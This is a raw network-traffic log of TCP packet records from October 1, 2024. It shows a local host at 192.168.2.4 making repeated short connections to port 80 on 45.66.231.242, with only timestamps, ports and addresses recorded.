Oct 1, 2024 10:55:40.328120947 CEST	49775	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:40.332907915 CEST	80	49775	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:41.021992922 CEST	80	49775	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:41.022088051 CEST	80	49775	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:41.022138119 CEST	49775	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:41.022161007 CEST	49775	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:41.026896954 CEST	80	49775	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:41.180191994 CEST	49776	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:41.372984886 CEST	80	49776	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:41.373145103 CEST	49776	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:41.376389980 CEST	49776	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:41.381216049 CEST	80	49776	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:41.381303072 CEST	49776	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:41.386074066 CEST	80	49776	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:42.240808964 CEST	80	49776	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:42.240844011 CEST	80	49776	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:42.240978003 CEST	49776	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:42.241142035 CEST	49776	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:42.246151924 CEST	80	49776	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:42.407850981 CEST	49777	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:42.412844896 CEST	80	49777	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:42.412967920 CEST	49777	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:42.415899038 CEST	49777	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:42.421506882 CEST	80	49777	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:42.421720982 CEST	49777	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:42.427047968 CEST	80	49777	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:43.424582958 CEST	80	49777	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:43.424702883 CEST	80	49777	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:43.424782038 CEST	49777	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:43.424835920 CEST	49777	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:43.429625034 CEST	80	49777	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:43.576881886 CEST	49778	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:43.581789970 CEST	80	49778	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:43.581887007 CEST	49778	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:43.584779978 CEST	49778	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:43.589575052 CEST	80	49778	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:43.589678049 CEST	49778	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:43.594448090 CEST	80	49778	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:47.272047043 CEST	80	49778	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:47.272243023 CEST	80	49778	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:47.272279024 CEST	49778	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:47.272305965 CEST	49778	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:47.277080059 CEST	80	49778	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:47.451298952 CEST	49779	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:47.456300020 CEST	80	49779	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:47.456449986 CEST	49779	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:47.459558010 CEST	49779	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:47.464446068 CEST	80	49779	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:47.464643955 CEST	49779	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:47.469477892 CEST	80	49779	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:48.112679958 CEST	80	49779	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:48.112765074 CEST	80	49779	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:48.112864017 CEST	49779	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:48.112965107 CEST	49779	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:48.117743969 CEST	80	49779	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:48.275687933 CEST	49780	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:48.280445099 CEST	80	49780	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:48.280597925 CEST	49780	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:48.287878990 CEST	49780	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:48.292718887 CEST	80	49780	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:48.292928934 CEST	49780	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:48.297736883 CEST	80	49780	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:48.953130007 CEST	80	49780	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:48.953155994 CEST	80	49780	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:48.953210115 CEST	49780	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:48.966135979 CEST	49780	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:48.973432064 CEST	80	49780	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:49.326911926 CEST	49781	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:49.331891060 CEST	80	49781	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:49.332089901 CEST	49781	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:49.343225956 CEST	49781	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:49.348418951 CEST	80	49781	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:49.348505974 CEST	49781	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:49.353333950 CEST	80	49781	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:50.175956964 CEST	80	49781	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:50.176007986 CEST	80	49781	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:50.176023006 CEST	80	49781	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:50.176120043 CEST	49781	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:50.176244020 CEST	49781	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:50.181515932 CEST	80	49781	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:50.330219984 CEST	49782	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:50.335216045 CEST	80	49782	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:50.335424900 CEST	49782	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:50.338696003 CEST	49782	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:50.343583107 CEST	80	49782	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:50.343657017 CEST	49782	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:50.348455906 CEST	80	49782	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:50.990062952 CEST	80	49782	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:50.990089893 CEST	80	49782	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:50.990247011 CEST	49782	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:50.990309000 CEST	49782	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:50.995191097 CEST	80	49782	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:51.131757975 CEST	49783	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:51.136667967 CEST	80	49783	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:51.136778116 CEST	49783	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:51.139950991 CEST	49783	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:51.144754887 CEST	80	49783	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:51.144817114 CEST	49783	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:51.149602890 CEST	80	49783	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:51.897425890 CEST	80	49783	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:51.898024082 CEST	49783	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:51.898838043 CEST	80	49783	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:51.898919106 CEST	49783	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:51.902879000 CEST	80	49783	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:52.132230043 CEST	49784	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:52.137173891 CEST	80	49784	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:52.137289047 CEST	49784	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:52.151492119 CEST	49784	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:52.156368971 CEST	80	49784	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:52.156455994 CEST	49784	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:52.161297083 CEST	80	49784	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:53.034257889 CEST	80	49784	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:53.034431934 CEST	49784	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:53.034435987 CEST	80	49784	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:53.034487009 CEST	49784	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:53.039442062 CEST	80	49784	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:53.180248976 CEST	49786	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:53.185035944 CEST	80	49786	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:53.185112000 CEST	49786	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:53.188088894 CEST	49786	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:53.192883015 CEST	80	49786	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:53.192941904 CEST	49786	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:53.197700977 CEST	80	49786	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:53.833734035 CEST	80	49786	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:53.833873987 CEST	80	49786	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:53.833889008 CEST	49786	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:53.833935976 CEST	49786	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:53.838640928 CEST	80	49786	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:53.973316908 CEST	49787	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:53.980593920 CEST	80	49787	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:53.980722904 CEST	49787	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:53.983777046 CEST	49787	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:53.988547087 CEST	80	49787	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:53.988610983 CEST	49787	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:53.993417978 CEST	80	49787	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:54.638890028 CEST	80	49787	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:54.638936043 CEST	80	49787	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:54.639138937 CEST	49787	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:54.639138937 CEST	49787	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:54.643997908 CEST	80	49787	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:54.944264889 CEST	49788	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:54.949932098 CEST	80	49788	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:54.950033903 CEST	49788	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:54.952989101 CEST	49788	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:54.958621979 CEST	80	49788	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:54.958719969 CEST	49788	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:54.964356899 CEST	80	49788	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:55.642245054 CEST	80	49788	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:55.642383099 CEST	80	49788	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:55.642415047 CEST	49788	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:55.642457962 CEST	49788	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:55.647797108 CEST	80	49788	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:55.781492949 CEST	49789	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:55.786437988 CEST	80	49789	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:55.786540031 CEST	49789	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:55.788645983 CEST	49789	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:55.793500900 CEST	80	49789	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:55.793611050 CEST	49789	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:55.798403978 CEST	80	49789	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:56.438821077 CEST	80	49789	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:56.438947916 CEST	49789	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:56.438973904 CEST	80	49789	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:56.439023972 CEST	49789	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:56.443701982 CEST	80	49789	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:56.579827070 CEST	49790	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:56.584677935 CEST	80	49790	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:56.584764957 CEST	49790	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:56.586863041 CEST	49790	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:56.591576099 CEST	80	49790	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:56.591639996 CEST	49790	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:56.596417904 CEST	80	49790	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:57.288909912 CEST	80	49790	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:57.289042950 CEST	49790	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:57.289057970 CEST	80	49790	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:57.289103985 CEST	49790	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:57.293823004 CEST	80	49790	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:57.440419912 CEST	49791	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:57.445255995 CEST	80	49791	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:57.445349932 CEST	49791	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:57.447319031 CEST	49791	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:57.452054977 CEST	80	49791	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:57.452107906 CEST	49791	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:57.456886053 CEST	80	49791	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:58.586699009 CEST	80	49791	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:58.586723089 CEST	80	49791	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:58.586843967 CEST	49791	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:58.593215942 CEST	49791	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:58.598040104 CEST	80	49791	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:58.748565912 CEST	49792	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:58.755343914 CEST	80	49792	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:58.755429029 CEST	49792	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:58.757473946 CEST	49792	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:58.764569998 CEST	80	49792	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:58.764642000 CEST	49792	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:58.771171093 CEST	80	49792	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:59.517257929 CEST	80	49792	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:59.517374039 CEST	49792	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:59.517424107 CEST	80	49792	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:59.517474890 CEST	49792	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:59.522201061 CEST	80	49792	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:59.667659044 CEST	49793	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:59.672612906 CEST	80	49793	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:59.672698975 CEST	49793	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:59.675770998 CEST	49793	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:59.680578947 CEST	80	49793	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:59.680644989 CEST	49793	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:59.685587883 CEST	80	49793	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:00.358503103 CEST	80	49793	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:00.358524084 CEST	80	49793	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:00.358622074 CEST	49793	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:00.358645916 CEST	49793	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:00.363531113 CEST	80	49793	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:00.501411915 CEST	49794	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:00.506222010 CEST	80	49794	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:00.506443977 CEST	49794	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:00.508444071 CEST	49794	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:00.513233900 CEST	80	49794	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:00.513320923 CEST	49794	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:00.518099070 CEST	80	49794	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:10.260781050 CEST	80	49794	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:10.260936975 CEST	49794	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:10.261046886 CEST	80	49794	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:10.261101007 CEST	49794	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:10.265824080 CEST	80	49794	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:10.426647902 CEST	49795	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:10.431473017 CEST	80	49795	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:10.431678057 CEST	49795	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:10.434482098 CEST	49795	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:10.439357042 CEST	80	49795	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:10.439429045 CEST	49795	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:10.444247961 CEST	80	49795	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:11.179004908 CEST	80	49795	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:11.179017067 CEST	80	49795	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:11.179166079 CEST	49795	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:11.179214954 CEST	49795	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:11.184005022 CEST	80	49795	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:11.341063976 CEST	49796	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:11.345901966 CEST	80	49796	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:11.346103907 CEST	49796	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:11.349014997 CEST	49796	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:11.353781939 CEST	80	49796	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:11.353854895 CEST	49796	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:11.358649015 CEST	80	49796	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:12.004467010 CEST	80	49796	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:12.004600048 CEST	49796	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:12.004873991 CEST	80	49796	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:12.004939079 CEST	49796	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:12.009437084 CEST	80	49796	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:12.159826994 CEST	49797	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:12.164660931 CEST	80	49797	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:12.164880037 CEST	49797	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:12.177352905 CEST	49797	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:12.182214975 CEST	80	49797	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:12.182284117 CEST	49797	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:12.187068939 CEST	80	49797	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:12.873409033 CEST	80	49797	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:12.873677969 CEST	49797	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:12.878757000 CEST	80	49797	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:12.878864050 CEST	49797	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:13.035339117 CEST	49798	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:13.040534973 CEST	80	49798	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:13.040647984 CEST	49798	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:13.043592930 CEST	49798	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:13.048494101 CEST	80	49798	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:13.048624039 CEST	49798	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:13.054224968 CEST	80	49798	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:13.732716084 CEST	80	49798	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:13.732745886 CEST	80	49798	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:13.732989073 CEST	49798	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:13.732989073 CEST	49798	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:13.740119934 CEST	80	49798	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:13.898308992 CEST	49799	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:13.903100967 CEST	80	49799	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:13.903306007 CEST	49799	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:13.906301022 CEST	49799	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:13.911075115 CEST	80	49799	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:13.911144018 CEST	49799	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:13.915899992 CEST	80	49799	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:14.662214041 CEST	80	49799	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:14.662345886 CEST	80	49799	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:14.662420988 CEST	49799	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:14.662488937 CEST	49799	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:14.668284893 CEST	80	49799	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:14.800889969 CEST	49800	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:14.805808067 CEST	80	49800	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:14.805883884 CEST	49800	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:14.808928013 CEST	49800	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:14.813663960 CEST	80	49800	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:14.813721895 CEST	49800	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:14.818471909 CEST	80	49800	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:15.549448013 CEST	80	49800	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:15.549463034 CEST	80	49800	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:15.549540043 CEST	49800	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:15.552753925 CEST	49800	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:15.557519913 CEST	80	49800	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:15.694262028 CEST	49801	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:15.699174881 CEST	80	49801	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:15.699311018 CEST	49801	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:15.702488899 CEST	49801	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:15.707354069 CEST	80	49801	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:15.707474947 CEST	49801	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:15.712326050 CEST	80	49801	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:16.583683014 CEST	80	49801	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:16.583957911 CEST	49801	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:16.584099054 CEST	80	49801	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:16.584214926 CEST	49801	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:16.590965986 CEST	80	49801	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:16.745603085 CEST	49802	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:16.750842094 CEST	80	49802	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:16.750915051 CEST	49802	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:16.753540993 CEST	49802	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:16.758394957 CEST	80	49802	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:16.758460045 CEST	49802	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:16.763644934 CEST	80	49802	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:17.493792057 CEST	80	49802	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:17.494151115 CEST	80	49802	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:17.494273901 CEST	49802	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:17.496754885 CEST	49802	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:17.501549006 CEST	80	49802	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:17.767184019 CEST	49803	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:17.772124052 CEST	80	49803	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:17.772222042 CEST	49803	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:17.784352064 CEST	49803	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:17.789354086 CEST	80	49803	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:17.789424896 CEST	49803	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:17.794210911 CEST	80	49803	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:21.570405960 CEST	80	49803	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:21.570424080 CEST	80	49803	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:21.570507050 CEST	49803	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:21.570593119 CEST	49803	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:21.575285912 CEST	80	49803	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:21.716825008 CEST	49804	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:21.722038984 CEST	80	49804	45.66.231.242	192.168.2.4
